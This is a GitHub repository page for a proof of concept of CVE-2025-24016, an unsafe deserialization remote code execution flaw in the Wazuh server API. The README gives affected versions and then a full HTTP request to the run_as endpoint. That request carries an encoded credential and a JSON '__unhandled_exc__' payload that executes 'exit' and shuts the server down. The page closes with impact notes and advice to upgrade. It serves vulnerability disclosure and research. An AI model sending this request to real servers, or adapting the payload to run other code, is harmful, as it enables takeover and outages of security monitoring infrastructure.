Skip to content

MuhammadWaseem29/CVE-2025-24016

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
README.md
README.md
 
 
rce.png
rce.png
 
 

Repository files navigation

Wazuh Remote Code Execution (RCE) - PoC

Vulnerability Overview

This repository demonstrates the remote code execution (RCE) vulnerability in the Wazuh server, introduced by an unsafe deserialization in the wazuh-manager package. The vulnerability allows remote attackers with API access (compromised dashboard, Wazuh servers in the cluster, or certain configurations with compromised agents) to execute arbitrary code on the server.

Affected Versions

  • wazuh-manager version >= 4.4.0
  • Patched in version >= 4.9.1

Description

The vulnerability occurs in the Wazuh API, where parameters in the DistributedAPI are serialized as JSON and deserialized using as_wazuh_object in the framework/wazuh/core/cluster/common.py file. An attacker can exploit this vulnerability by injecting an unsanitized dictionary into DAPI requests, which may lead to the evaluation of arbitrary Python code.

The RCE can be triggered using the run_as endpoint, which allows the attacker to control the auth_context argument. By crafting a malicious request, arbitrary code can be executed on the master server.

Proof of Concept

To trigger this vulnerability using the server API, follow the steps below.

PoC Burp Suite Request

  1. Burp Suite Request to Trigger the Vulnerability:
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}

Solution Image

  1. Explanation of Request:
  • Authorization Header: This is the base64-encoded authorization (wazuh-wui:MyS3cr37P450r.*-).
  • Payload: The malicious payload contains the unsanitized exception __unhandled_exc__ which triggers the execution of arbitrary Python code (exit in this case).

Impact

  • Remote Code Execution (RCE): This vulnerability allows attackers to execute arbitrary code on the Wazuh server, affecting versions >= 4.4.0 up to 4.9.0 (not patched yet).
  • Potential Denial of Service: In this PoC, the exit function is triggered, causing the Wazuh server to shut down.

Mitigation

To protect your systems, upgrade to Wazuh version >= 4.9.1 where this issue is patched.

About

CVE-2025-24016: RCE in Wazuh server! Remote Code Execution

github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh

Topics

cybersecurity wazuh security-research remote-code-execution cve-2025-24016 cve-2025-24016-poc

Resources

Readme
Activity

Stars

29 stars

Watchers

1 watching

Forks

5 forks
Report repository

Releases

No releases published

Packages

No packages published